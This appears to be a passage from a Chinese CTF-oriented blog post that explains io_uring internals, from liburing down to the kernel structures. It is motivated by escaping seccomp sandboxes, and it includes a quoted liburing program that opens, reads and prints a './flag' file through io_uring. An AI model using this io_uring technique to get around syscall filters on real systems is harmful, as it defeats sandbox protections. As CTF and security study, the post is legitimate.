Linux.io_uring-Top-down-Approach
2024-03-05 08:46:36 # CTF

最近在 N1 线下赛遇见一个 seccomp 沙箱,限制了只能使用 io_uring_setup 一个系统调用;而在之前不久的 ACTF 中,是使用 mmap、io_uring_setup、io_uring_enter 三个系统调用完成了 orw。那么如何仅仅使用 io_uring_setup 完成 orw 呢?

本文将不仅仅局限于CTF,而是从io_uring的实现出发,先从宏观角度透视io_uring的实现框架, 然后以源代码为基础,自顶向下,从liburing,到内核io_uring的用户态接口, 最后到io_uring的内核实现,一步步聚焦 io_uring 具体的实现。

由于笔者的研究方向是二进制安全,因此笔者将更多关注 io_uring 中用户态和内核态通信这一容易产生安全漏洞的模块,而不会聚焦 io_uring 的异步调度和任务处理,以上。

overview

在开始前,首先介绍一下什么是io_uring

io_uring 是 Linux 5.1 引入的一套新的异步 I/O 接口机制,主要有以下特点:

  1. 高效 - 通过共享内存和无锁的接口设计,大大降低了系统调用开销。
  2. 灵活 - 支持阻塞、非阻塞、轮询等多种调用方式,可以同时提交多个 I/O 请求,并通过轮询或异步方式得到完成通知。
  3. 通用 - 支持文件、网络、定时等多种 I/O 操作,统一了异步 I/O 接口。

io_uring 主要由提交队列(SQ)、完成队列(CQ)、SQEs 请求和 CQEs 结果组成。

其中SQE和CQE 分别是SQ和CQ中的一个实体。

应用通过mmap映射SQ和CQ,向SQ提交I/O请求,再通过读CQ获取I/O完成结果。这避免了大量的 context switch 和系统调用开销。
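顺带给出 CQE 对应的 UAPI 结构体,它非常小,内核把每个请求的完成结果写进 cqe->res(下面的定义以内核 include/uapi/linux/io_uring.h 为准,不同版本可能略有差异):

struct io_uring_cqe {
	__u64	user_data;	/* 提交时 sqe->user_data 会被原样带回 */
	__s32	res;		/* 请求结果: 如 open 返回的 fd、read 的字节数或负的错误码 */
	__u32	flags;

	/*
	 * 如果 ring 以 IORING_SETUP_CQE32 初始化, 这里还会多出 16 字节
	 */
	__u64	big_cqe[];
};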

这里以 ACTF 中星盟的师傅用 liburing 实现 orw 的一个小例子,来介绍一下 io_uring 的工作原理。

// ref from https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup/#title-9

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <liburing.h>
#include <unistd.h>
#include <syscall.h>
#include <sys/prctl.h>

#define QUEUE_DEPTH 1

int main() {
struct io_uring ring = {0};
struct io_uring_sqe *sqe;
struct io_uring_cqe *cqe;
int fd, ret;
char buffer[4096] = {0};

if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) {
perror("io_uring_queue_init");
return 1;
}

// 准备打开操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

int dirfd = AT_FDCWD; // 当前工作目录的文件描述符
const char *pathname = "./flag";
int flags = O_RDONLY;

io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Open error: %d\n", cqe->res);
return 1;
}

fd = cqe->res; // 获取打开的文件描述符

// 准备读取操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Read error: %d\n", cqe->res);
return 1;
}

// 准备写操作
sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

io_uring_prep_write(sqe, 1, buffer, strlen(buffer), 0);
io_uring_sqe_set_data(sqe, NULL);

// 提交请求
ret = io_uring_submit(&ring);
if (ret < 0) {
perror("io_uring_submit");
return 1;
}

// 等待完成
ret = io_uring_wait_cqe(&ring, &cqe);
if (ret < 0) {
perror("io_uring_wait_cqe");
return 1;
}

// 处理完成的请求
if (cqe->res < 0) {
fprintf(stderr, "Read error: %d\n", cqe->res);
return 1;
}

// printf("Read %d bytes: %s\n", cqe->res, buffer);

// 清理并关闭文件
io_uring_cqe_seen(&ring, cqe);
io_uring_queue_exit(&ring);
close(fd);
sleep(1);

return 0;
}

可以看到,如果要使用io_uring会经历如下流程:

首先通过 io_uring_queue_init 完成了初始化,io_uring的sq和cq队列也被创建

在库内部实际上是使用 io_uring_setup 和 mmap 两个 syscall 实现的

前者完成了内核中相应结构体和资源的创建,后者将两个队列映射到用户态内存,通过共享内存方便用户态访问

if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) {
perror("io_uring_queue_init");
return 1;
}
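如果不借助 liburing,这一步大致等价于下面两个原始系统调用(一个简化的示意,省略了 CQ ring、sqes 的映射以及 FEAT_SINGLE_MMAP 等细节,仅演示调用方式):

#include <linux/io_uring.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

int raw_setup(unsigned entries, struct io_uring_params *p, void **sq_ring)
{
	int fd;

	memset(p, 0, sizeof(*p));
	fd = (int)syscall(__NR_io_uring_setup, entries, p); /* 创建内核侧结构体和资源 */
	if (fd < 0)
		return fd;

	/* 把 SQ ring 映射到用户态, CQ ring / sqes 的映射方式类似 */
	*sq_ring = mmap(NULL, p->sq_off.array + p->sq_entries * sizeof(unsigned),
			PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
			fd, IORING_OFF_SQ_RING);
	if (*sq_ring == MAP_FAILED)
		return -1;
	return fd;
}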

然后,用户使用 io_uring_get_sqe 得到一个 sqe(SQ 队列中的一个实体),并根据所要完成的任务设置 sqe 的各个成员,这个过程是完全在用户态完成的。

sqe = io_uring_get_sqe(&ring);
if (!sqe) {
fprintf(stderr, "Failed to get SQE\n");
return 1;
}

int dirfd = AT_FDCWD; // 当前工作目录的文件描述符
const char *pathname = "./flag";
int flags = O_RDONLY;

io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);
io_uring_sqe_set_data(sqe, NULL);

最后,通过 io_uring_submit 提交了请求,库内部实际上是调用了 io_uring_enter

ret = io_uring_submit(&ring);

io_uring任务收割模式

这里主要解释一下 IORING_SETUP_SQPOLL 和 IORING_SETUP_IOPOLL 的区别

IORING_SETUP_SQPOLL
When this flag is specified, a kernel thread is created to
perform submission queue polling. An io_uring instance
configured in this way enables an application to issue I/O
without ever context switching into the kernel. By using
the submission queue to fill in new submission queue
entries and watching for completions on the completion
queue, the application can submit and reap I/Os without
doing a single system call.
If the kernel thread is idle for more than sq_thread_idle
milliseconds, it will set the IORING_SQ_NEED_WAKEUP bit in
the flags field of the struct io_sq_ring. When this
happens, the application must call io_uring_enter(2) to
wake the kernel thread. If I/O is kept busy, the kernel
thread will never sleep. An application making use of
this feature will need to guard the io_uring_enter(2) call
with the following code sequence:
/*
* Ensure that the wakeup flag is read after the tail pointer
* has been written. It’s important to use memory load acquire
* semantics for the flags read, as otherwise the application
* and the kernel might not agree on the consistency of the
* wakeup flag.
*/
unsigned flags = atomic_load_relaxed(sq_ring->flags);
if (flags & IORING_SQ_NEED_WAKEUP)
io_uring_enter(fd, 0, 0, IORING_ENTER_SQ_WAKEUP);

IORING_SETUP_IOPOLL
Perform busy-waiting for an I/O completion, as opposed to
getting notifications via an asynchronous IRQ (Interrupt
Request). The file system (if any) and block device must
support polling in order for this to work. Busy-waiting
provides lower latency, but may consume more CPU resources
than interrupt driven I/O. Currently, this feature is
usable only on a file descriptor opened using the O_DIRECT
flag. When a read or write is submitted to a polled
context, the application must poll for completions on the
CQ ring by calling io_uring_enter(2). It is illegal to
mix and match polled and non-polled I/O on an io_uring
instance.
This is only applicable for storage devices for now, and
the storage device must be configured for polling. How to
do that depends on the device type in question. For NVMe
devices, the nvme driver must be loaded with the
poll_queues parameter set to the desired number of polling
queues. The polling queues will be shared appropriately
between the CPUs in the system, if the number is less than
the number of online CPU threads.

即,SQPOLL 模式由内核线程轮询 SQ 来获取并提交任务,应用通常无需系统调用,只有在内核线程空闲超时休眠后才需要 io_uring_enter 唤醒它;
IOPOLL 模式则需要应用通过 io_uring_enter 对完成事件进行忙轮询来收割任务。
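下面给出一个开启 SQPOLL 的最小初始化示意(基于 liburing,sq_thread_idle 等字段的含义见上面的 man page 摘录;仅为示意,较老内核上 SQPOLL 可能还需要额外权限):

#include <liburing.h>

int init_sqpoll_ring(struct io_uring *ring)
{
	struct io_uring_params p = {0};

	p.flags = IORING_SETUP_SQPOLL;  /* 由内核线程轮询 SQ, 提交时无需 syscall */
	p.sq_thread_idle = 2000;        /* 内核线程空闲 2000ms 后休眠, 之后需 io_uring_enter 唤醒 */

	return io_uring_queue_init_params(8, ring, &p);
}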

struct

其次,需要在讲解前,介绍一下 liburing 和 内核暴露出的一些结构体:

liburing

首先是 io_uring,这是 liburing 中关于 io_uring 的核心管理结构体:

struct io_uring {
struct io_uring_sq sq; // sq 管理结构体
struct io_uring_cq cq; // cq 管理结构体
unsigned flags; // setup时的flag设置
// 以下setup返回时写入params的一些信息
int ring_fd;
unsigned features;
int enter_ring_fd;
__u8 int_flags;
__u8 pad[3];
unsigned pad2;
};

io_uring_sq 是 sq 的管理结构体。这个结构体在 6.5 及以下的版本可以在内核中找到,在 6.5 以上的版本中已从内核删除;6.5 以上的内核中使用 io_rings,相当于 io_uring_sq 和 io_uring_cq 的组合。

struct io_uring_sq {
unsigned *khead;
unsigned *ktail;
// Deprecated: use `ring_mask` instead of `*kring_mask`
unsigned *kring_mask;
// Deprecated: use `ring_entries` instead of `*kring_entries`
unsigned *kring_entries;
unsigned *kflags;
unsigned *kdropped;
unsigned *array;
struct io_uring_sqe *sqes;

unsigned sqe_head;
unsigned sqe_tail;

size_t ring_sz;
void *ring_ptr;

unsigned ring_mask;
unsigned ring_entries;

unsigned pad[2];
};

在此着重解释一下ring_ptr和 sqes两个成员:
这两个成员,在没有设置NO_MMAP的情况下,都是由 io_uring_setup 后用mmap映射得到的。

ring_ptr 指向一片内核处理 io_uring 时使用的信息,例如当前循环队列的 head 和 tail。io_uring_setup 返回时会设置 io_uring_params 中的 sq_off 结构,这个结构记录了各个成员相对于 ring_ptr 的偏移,最后在 [[#io_uring_setup_ring_pointers]] 中把相关指针设置为和内核共享的内存区域中对应偏移处的地址。

而 sqes 则指向真正存放 SQE 的共享队列区域。

类似地,还存在 io_uring_cq 结构体,用来管理 cq。
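它的字段和 io_uring_sq 基本对应,大致如下(以 liburing 源码为准,不同版本略有差异):

struct io_uring_cq {
	unsigned *khead;
	unsigned *ktail;
	// Deprecated: use `ring_mask` instead of `*kring_mask`
	unsigned *kring_mask;
	// Deprecated: use `ring_entries` instead of `*kring_entries`
	unsigned *kring_entries;
	unsigned *kflags;
	unsigned *koverflow;
	struct io_uring_cqe *cqes;

	size_t ring_sz;
	void *ring_ptr;

	unsigned ring_mask;
	unsigned ring_entries;

	unsigned pad[2];
};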

kernel

首先是io_uring_params

它是 io_uring_setup 传入的参数;同时在返回时,kernel 会给此结构体的相应成员赋值。

此结构体也是内核提供给用户态的 UAPI 的一部分:

struct io_uring_params {
__u32 sq_entries;
__u32 cq_entries;
__u32 flags;
__u32 sq_thread_cpu; // 内核任务处理线程占用的cpu
__u32 sq_thread_idle; // 内核任务处理线程最大闲置时间,
// 见`IORING_SETUP_SQPOLL`
__u32 features;
__u32 wq_fd;
__u32 resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};

io_uring_sqe 用来表征一个 IO 任务(即 sqe),通过在 sqes 环形队列上写入此结构体来实现任务的提交。其中大部分字段都是传递给相应任务处理函数的参数。

struct io_uring_sqe {
__u8 opcode; // 任务的类型, 用一系列枚举变量来表示
__u8 flags; // 任务的一些标志位, 可以设置任务的一些特性
__u16 ioprio; /* ioprio for the request */
__s32 fd; /* file descriptor to do IO on */
union {
__u64 off; /* offset into file */
__u64 addr2;
struct {
__u32 cmd_op;
__u32 __pad1;
};
};
union {
__u64 addr; /* pointer to buffer or iovecs */
__u64 splice_off_in;
};
__u32 len; /* buffer size or number of iovecs */
union {
__kernel_rwf_t rw_flags;
__u32 fsync_flags;
__u16 poll_events; /* compatibility */
__u32 poll32_events; /* word-reversed for BE */
__u32 sync_range_flags;
__u32 msg_flags;
__u32 timeout_flags;
__u32 accept_flags;
__u32 cancel_flags;
__u32 open_flags;
__u32 statx_flags;
__u32 fadvise_advice;
__u32 splice_flags;
__u32 rename_flags;
__u32 unlink_flags;
__u32 hardlink_flags;
__u32 xattr_flags;
__u32 msg_ring_flags;
__u32 uring_cmd_flags;
};
__u64 user_data; /* data to be passed back at completion time */
/* pack this to avoid bogus arm OABI complaints */
union {
/* index into fixed buffers, if used */
__u16 buf_index;
/* for grouped buffer selection */
__u16 buf_group;
} __attribute__((packed));
/* personality to use, if used */
__u16 personality;
union {
__s32 splice_fd_in;
__u32 file_index;
struct {
__u16 addr_len;
__u16 __pad3[1];
};
};
union {
struct {
__u64 addr3;
__u64 __pad2[1];
};
/*
* If the ring is initialized with IORING_SETUP_SQE128, then
* this field is used for 80 bytes of arbitrary command data
*/
__u8 cmd[0];
};
};
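作为对照,下面给出一个不经过 liburing、直接按上面字段含义手工填充 sqe 来完成 openat 的小示意(字段取值参考后文 io_uring_prep_openat 的实现,仅作示意):

#include <linux/io_uring.h>
#include <fcntl.h>
#include <string.h>

/* 把一个 openat 请求手工写进共享内存中的某个 sqe */
static void fill_openat_sqe(struct io_uring_sqe *sqe, const char *path)
{
	memset(sqe, 0, sizeof(*sqe));
	sqe->opcode     = IORING_OP_OPENAT;      /* 任务类型 */
	sqe->fd         = AT_FDCWD;              /* dirfd, -100 表示相对当前工作目录 */
	sqe->addr       = (unsigned long)path;   /* 路径字符串的用户态地址 */
	sqe->open_flags = O_RDONLY;
	sqe->user_data  = 0x1337;                /* 完成时会在 cqe->user_data 中原样返回 */
}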

io_ring_ctx 是kernel io_uring运行的上下文,记录了io_uring 运行时需要保存的一些信息,这里就不一一分析每个成员了

struct io_ring_ctx {
/* const or read-mostly hot data */
struct {
unsigned int flags;
unsigned int drain_next: 1;
unsigned int restricted: 1;
unsigned int off_timeout_used: 1;
unsigned int drain_active: 1;
unsigned int has_evfd: 1;
/* all CQEs should be posted only by the submitter task */
unsigned int task_complete: 1;
unsigned int lockless_cq: 1;
unsigned int syscall_iopoll: 1;
unsigned int poll_activated: 1;
unsigned int drain_disabled: 1;
unsigned int compat: 1;

struct task_struct *submitter_task;
struct io_rings *rings;
struct percpu_ref refs;

enum task_work_notify_mode notify_method;
} ____cacheline_aligned_in_smp;

/* submission data */
struct {
struct mutex uring_lock;

/*
* Ring buffer of indices into array of io_uring_sqe, which is
* mmapped by the application using the IORING_OFF_SQES offset.
*
* This indirection could e.g. be used to assign fixed
* io_uring_sqe entries to operations and only submit them to
* the queue when needed.
*
* The kernel modifies neither the indices array nor the entries
* array.
*/
u32 *sq_array;
struct io_uring_sqe *sq_sqes;
unsigned cached_sq_head;
unsigned sq_entries;

/*
* Fixed resources fast path, should be accessed only under
* uring_lock, and updated through io_uring_register(2)
*/
struct io_rsrc_node *rsrc_node;
atomic_t cancel_seq;
struct io_file_table file_table;
unsigned nr_user_files;
unsigned nr_user_bufs;
struct io_mapped_ubuf **user_bufs;

struct io_submit_state submit_state;

struct io_buffer_list *io_bl;
struct xarray io_bl_xa;

struct io_hash_table cancel_table_locked;
struct io_alloc_cache apoll_cache;
struct io_alloc_cache netmsg_cache;

/*
* ->iopoll_list is protected by the ctx->uring_lock for
* io_uring instances that don't use IORING_SETUP_SQPOLL.
* For SQPOLL, only the single threaded io_sq_thread() will
* manipulate the list, hence no extra locking is needed there.
*/
struct io_wq_work_list iopoll_list;
bool poll_multi_queue;
} ____cacheline_aligned_in_smp;

struct {
/*
* We cache a range of free CQEs we can use, once exhausted it
* should go through a slower range setup, see __io_get_cqe()
*/
struct io_uring_cqe *cqe_cached;
struct io_uring_cqe *cqe_sentinel;

unsigned cached_cq_tail;
unsigned cq_entries;
struct io_ev_fd __rcu *io_ev_fd;
unsigned cq_extra;
} ____cacheline_aligned_in_smp;

/*
* task_work and async notification delivery cacheline. Expected to
* regularly bounce b/w CPUs.
*/
struct {
struct llist_head work_llist;
unsigned long check_cq;
atomic_t cq_wait_nr;
atomic_t cq_timeouts;
struct wait_queue_head cq_wait;
} ____cacheline_aligned_in_smp;

/* timeouts */
struct {
spinlock_t timeout_lock;
struct list_head timeout_list;
struct list_head ltimeout_list;
unsigned cq_last_tm_flush;
} ____cacheline_aligned_in_smp;

struct io_uring_cqe completion_cqes[16];

spinlock_t completion_lock;

/* IRQ completion list, under ->completion_lock */
struct io_wq_work_list locked_free_list;
unsigned int locked_free_nr;

struct list_head io_buffers_comp;
struct list_head cq_overflow_list;
struct io_hash_table cancel_table;

const struct cred *sq_creds; /* cred used for __io_sq_thread() */
struct io_sq_data *sq_data; /* if using sq thread polling */

struct wait_queue_head sqo_sq_wait;
struct list_head sqd_list;

unsigned int file_alloc_start;
unsigned int file_alloc_end;

struct xarray personalities;
u32 pers_next;

struct list_head io_buffers_cache;

/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;

/* slow path rsrc auxilary data, used by update/register */
struct io_mapped_ubuf *dummy_ubuf;
struct io_rsrc_data *file_data;
struct io_rsrc_data *buf_data;

/* protected by ->uring_lock */
struct list_head rsrc_ref_list;
struct io_alloc_cache rsrc_node_cache;
struct wait_queue_head rsrc_quiesce_wq;
unsigned rsrc_quiesce;

struct list_head io_buffers_pages;

#if defined(CONFIG_UNIX)
struct socket *ring_sock;
#endif
/* hashed buffered write serialization */
struct io_wq_hash *hash_map;

/* Only used for accounting purposes */
struct user_struct *user;
struct mm_struct *mm_account;

/* ctx exit and cancelation */
struct llist_head fallback_llist;
struct delayed_work fallback_work;
struct work_struct exit_work;
struct list_head tctx_list;
struct completion ref_comp;

/* io-wq management, e.g. thread count */
u32 iowq_limits[2];
bool iowq_limits_set;

struct callback_head poll_wq_task_work;
struct list_head defer_list;
unsigned sq_thread_idle;
/* protected by ->completion_lock */
unsigned evfd_last_cq_tail;

/*
* If IORING_SETUP_NO_MMAP is used, then the below holds
* the gup'ed pages for the two rings, and the sqes.
*/
unsigned short n_ring_pages;
unsigned short n_sqe_pages;
struct page **ring_pages;
struct page **sqe_pages;
};

liburing

liburing 提供的核心接口有如下函数:

  • io_uring_queue_init: io_uring 的初始化函数,用来初始化一个 io_uring 结构体
  • io_uring_prep_xxx: 用来准备一个任务(设置 sqe)
  • io_uring_submit: 用来提交任务

io_uring_queue_init

参数:

  • entries: sq 队列大小
  • ring: io_uring 结构体,liburing 提供给用户态的管理结构
  • flags: 传递给 io_uring_setup 的 params 中的 flag,用来控制创建的 io_uring 的特性,详情可以看 io_uring_setup

返回值:

  • 成功返回 0,失败返回负的错误码;io_uring_setup 得到的、用来 mmap 的 fd 保存在 ring->ring_fd 中
__cold int io_uring_queue_init(unsigned entries, struct io_uring *ring,
unsigned flags)
{
struct io_uring_params p;

memset(&p, 0, sizeof(p));
p.flags = flags;

return io_uring_queue_init_params(entries, ring, &p);
}

接下来是一系列调用链:

-->io_uring_queue_init
-->io_uring_queue_init_params
-->io_uring_queue_init_try_nosqarr
-->__io_uring_queue_init_params

最后到 __io_uring_queue_init_params

其中 p 是要传递给 io_uring_setup 的params, buf 的使用将在后面分析.

int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring,
struct io_uring_params *p, void *buf,
size_t buf_size)
{
int fd, ret = 0;
unsigned *sq_array;
unsigned sq_entries, index;

memset(ring, 0, sizeof(*ring));

/*
* The kernel does this check already, but checking it here allows us
* to avoid handling it below.
*/
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY
&& !(p->flags & IORING_SETUP_NO_MMAP))
return -EINVAL;
// 如果设置了REGISTERED_FD_ONLY 就必须要设置 NO_MMAP

对于设置了NO_MMAP的请求,通过 io_uring_alloc_huge 进行了预处理,这个函数我们将在之后[[#io_uring_alloc_huge]]进行分析

if (p->flags & IORING_SETUP_NO_MMAP) {
ret = io_uring_alloc_huge(entries, p, &ring->sq, &ring->cq,
buf, buf_size);
if (ret < 0)
return ret;
if (buf)
ring->int_flags |= INT_FLAG_APP_MEM;
}
// 如果设置了NO_MMAP,就要预先分配大内存

接下来就是调用io_uring_setup 完成真正的初始化操作了。

fd = __sys_io_uring_setup(entries, p);
// syscall(__NR_io_uring_setup, entries, p)
if (fd < 0) {
if ((p->flags & IORING_SETUP_NO_MMAP) &&
!(ring->int_flags & INT_FLAG_APP_MEM)) {
__sys_munmap(ring->sq.sqes, 1);
io_uring_unmap_rings(&ring->sq, &ring->cq);
}
return fd;
}
// 错误处理

对于没有设置 NO_MMAP 的情形,需要在此时mmap为sq和cq在用户态映射内存[[#io_uring_queue_mmap]],反之,直接设置ring相关指针[[#io_uring_setup_ring_pointers]]

if (!(p->flags & IORING_SETUP_NO_MMAP)) {
ret = io_uring_queue_mmap(fd, p, ring);
if (ret) {
__sys_close(fd);
return ret;
}
} else {
io_uring_setup_ring_pointers(p, &ring->sq, &ring->cq);
}

之后,是将io_uring_setup 设置在 params 中的各种变量复制到用户态管理结构体ring中。

	sq_entries = ring->sq.ring_entries;

if (!(p->flags & IORING_SETUP_NO_SQARRAY)) {
sq_array = ring->sq.array;
for (index = 0; index < sq_entries; index++)
sq_array[index] = index;
}
ring->features = p->features;
// io_uring 的 特性
ring->flags = p->flags;
// io_uring 设置的标志
ring->enter_ring_fd = fd;
// 返回的fd
if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) {
ring->ring_fd = -1;
ring->int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING;
} else {
ring->ring_fd = fd;
}

return ret;
}

io_uring_alloc_huge

io_uring_alloc_huge 是对于设置了NO_MMAP的程序,预先在用户态设置好SQ和CQ的内存的函数

首先是会用到的各种参数和变量

static int io_uring_alloc_huge(unsigned entries, struct io_uring_params *p,
struct io_uring_sq *sq, struct io_uring_cq *cq,
void *buf, size_t buf_size)
{
unsigned long page_size = get_page_size();
unsigned sq_entries, cq_entries;
size_t ring_mem, sqes_mem;
unsigned long mem_used = 0;
void *ptr;
int ret;

接下来首先确定 sq 和 cq entries 的数量。具体算法就不在这里分析了,主要包括合法性检查和按 2 的幂向上取整等运算。

ret = get_sq_cq_entries(entries, p, &sq_entries, &cq_entries);
if (ret)
return ret;

接下来就是计算sq和cq需要的内存大小了,计算过程非常直观,笔者就不赘述了:

sqes_mem = sq_entries * sizeof(struct io_uring_sqe);
sqes_mem = (sqes_mem + page_size - 1) & ~(page_size - 1);
ring_mem = cq_entries * sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
ring_mem *= 2;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
ring_mem += sq_entries * sizeof(unsigned);
mem_used = sqes_mem + ring_mem;
mem_used = (mem_used + page_size - 1) & ~(page_size - 1);

接下来,就是真正决定sq和cq的用户态地址了。

首先,如果用户传入了buf,并且buf_size足够大, 那么就设置为用户buf

否则,就 mmap 出一片内存来使用(根据 size 计算的不同,可能是 4K 也可能是 2M,分别对应一个普通页和一个大页)

if (!buf && (sqes_mem > huge_page_size || ring_mem > huge_page_size))
return -ENOMEM;

if (buf) {
if (mem_used > buf_size)
return -ENOMEM;
ptr = buf;
} else {
int map_hugetlb = 0;
if (sqes_mem <= page_size)
buf_size = page_size;
else {
buf_size = huge_page_size;
map_hugetlb = MAP_HUGETLB;
}
ptr = __sys_mmap(NULL, buf_size, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS|map_hugetlb,
-1, 0);
if (IS_ERR(ptr))
return PTR_ERR(ptr);
}
sq->sqes = ptr;

并以类似的方式设置了sq->ring_ptr


if (mem_used <= buf_size)
{
sq->ring_ptr = (void *)sq->sqes + sqes_mem;
/* clear ring sizes, we have just one mmap() to undo */
cq->ring_sz = 0;
sq->ring_sz = 0;
}
else
{
int map_hugetlb = 0;
if (ring_mem <= page_size)
buf_size = page_size;
else
{
buf_size = huge_page_size;
map_hugetlb = MAP_HUGETLB;
}
ptr = __sys_mmap(NULL, buf_size, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS | map_hugetlb,
-1, 0);
if (IS_ERR(ptr))
{
__sys_munmap(sq->sqes, 1);
return PTR_ERR(ptr);
}
sq->ring_ptr = ptr;
sq->ring_sz = buf_size;
cq->ring_sz = 0;
}

不过下面一部分就是真正重要的了:

p正是传入 io_uring_setup 的结构体,所以对p的赋值才是至关重要的,这里的sq和cq不过是 liburing 暴露给用户的管理结构 io_uring 中的一个成员

cq->ring_ptr = (void *)sq->ring_ptr;
p->sq_off.user_addr = (unsigned long)sq->sqes;
p->cq_off.user_addr = (unsigned long)sq->ring_ptr;
return (int)mem_used;

所以归根结底,就是把用户态内存的地址写入了 p 的 sq_off.user_addr 和 cq_off.user_addr。
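换句话说,绕过 liburing 时,用户也可以自己准备好内存后直接填入 params 再调用 io_uring_setup。下面是一个粗略示意(假设内核和头文件支持 IORING_SETUP_NO_MMAP,即 6.5+;两块内存需要页对齐,内部布局细节以内核实现为准):

#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* sqes_buf / rings_buf 是用户提前 mmap 好的两块页对齐共享内存 */
int setup_no_mmap(void *sqes_buf, void *rings_buf, unsigned entries)
{
	struct io_uring_params p;

	memset(&p, 0, sizeof(p));
	p.flags = IORING_SETUP_NO_MMAP;
	p.sq_off.user_addr = (unsigned long long)sqes_buf;  /* sqes 所在内存 */
	p.cq_off.user_addr = (unsigned long long)rings_buf; /* rings(含 SQ/CQ head、tail 等)所在内存 */

	return (int)syscall(__NR_io_uring_setup, entries, &p);
}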

io_uring_queue_mmap

这是在没有设置 NO_MMAP 的情形下,完成 io_uring_setup 这个 syscall 之后进行 mmap 的流程。

__cold int io_uring_queue_mmap(int fd, struct io_uring_params *p,
struct io_uring *ring)
{
memset(ring, 0, sizeof(*ring));
return io_uring_mmap(fd, p, &ring->sq, &ring->cq);
}

首先是计算了sq和cq的ring的size

static int io_uring_mmap(int fd, struct io_uring_params *p,
struct io_uring_sq *sq, struct io_uring_cq *cq)
{
size_t size;
int ret;

size = sizeof(struct io_uring_cqe);
if (p->flags & IORING_SETUP_CQE32)
size += sizeof(struct io_uring_cqe);

sq->ring_sz = p->sq_off.array + p->sq_entries * sizeof(unsigned);
cq->ring_sz = p->cq_off.cqes + p->cq_entries * size;

然后开始mmap sq 和 cq ring的指针:

if (p->features & IORING_FEAT_SINGLE_MMAP)
{
if (cq->ring_sz > sq->ring_sz)
sq->ring_sz = cq->ring_sz;
cq->ring_sz = sq->ring_sz;
}
sq->ring_ptr = __sys_mmap(0, sq->ring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd,
IORING_OFF_SQ_RING);// offset = 0
if (IS_ERR(sq->ring_ptr))
return PTR_ERR(sq->ring_ptr);

if (p->features & IORING_FEAT_SINGLE_MMAP)
{
cq->ring_ptr = sq->ring_ptr;
}
else
{
cq->ring_ptr = __sys_mmap(0, cq->ring_sz, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd,
IORING_OFF_CQ_RING);
// offset = 0x8000000 (IORING_OFF_CQ_RING)
if (IS_ERR(cq->ring_ptr))
{
ret = PTR_ERR(cq->ring_ptr);
cq->ring_ptr = NULL;
goto err;
}
}

如果内核支持 IORING_FEAT_SINGLE_MMAP,就可以将 sq 和 cq 的 ring 用同一次 mmap 映射;否则,就分别单独 mmap。

最后再mmap sq的sqes

size = sizeof(struct io_uring_sqe);
if (p->flags & IORING_SETUP_SQE128)
size += 64;
sq->sqes = __sys_mmap(0, size * p->sq_entries, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQES);
if (IS_ERR(sq->sqes))
{
ret = PTR_ERR(sq->sqes);
err:
io_uring_unmap_rings(sq, cq);
return ret;
}

最后的最后,设置相关指针 [[#io_uring_setup_ring_pointers]]

io_uring_setup_ring_pointers(p, sq, cq);

io_uring_setup_ring_pointers

此函数用来设置 struct io_uring ring,也就是 liburing 的核心管理结构体。

我们知道 sq->ring_ptr 映射到内核中的一个结构体(io_rings),其中各个成员的偏移通过 io_uring_params 的两个 offset 结构体返回;这里据此拿到对应成员的指针,并赋值给 sq 和 cq 的各个成员,而 sq 和 cq 又是管理结构体 ring 的成员。

static void io_uring_setup_ring_pointers(struct io_uring_params *p,
struct io_uring_sq *sq,
struct io_uring_cq *cq)
{
sq->khead = sq->ring_ptr + p->sq_off.head;
// 设置sq head的指针
sq->ktail = sq->ring_ptr + p->sq_off.tail;
// 设置sq tail指针
sq->kring_mask = sq->ring_ptr + p->sq_off.ring_mask;
sq->kring_entries = sq->ring_ptr + p->sq_off.ring_entries;
// 设置sq entries个数
sq->kflags = sq->ring_ptr + p->sq_off.flags;
// 设置对应标志
sq->kdropped = sq->ring_ptr + p->sq_off.dropped;
if (!(p->flags & IORING_SETUP_NO_SQARRAY))
sq->array = sq->ring_ptr + p->sq_off.array;
// 如果存在sqarray
cq->khead = cq->ring_ptr + p->cq_off.head;
// 设置cq head指针
cq->ktail = cq->ring_ptr + p->cq_off.tail;
// 设置cq tail指针
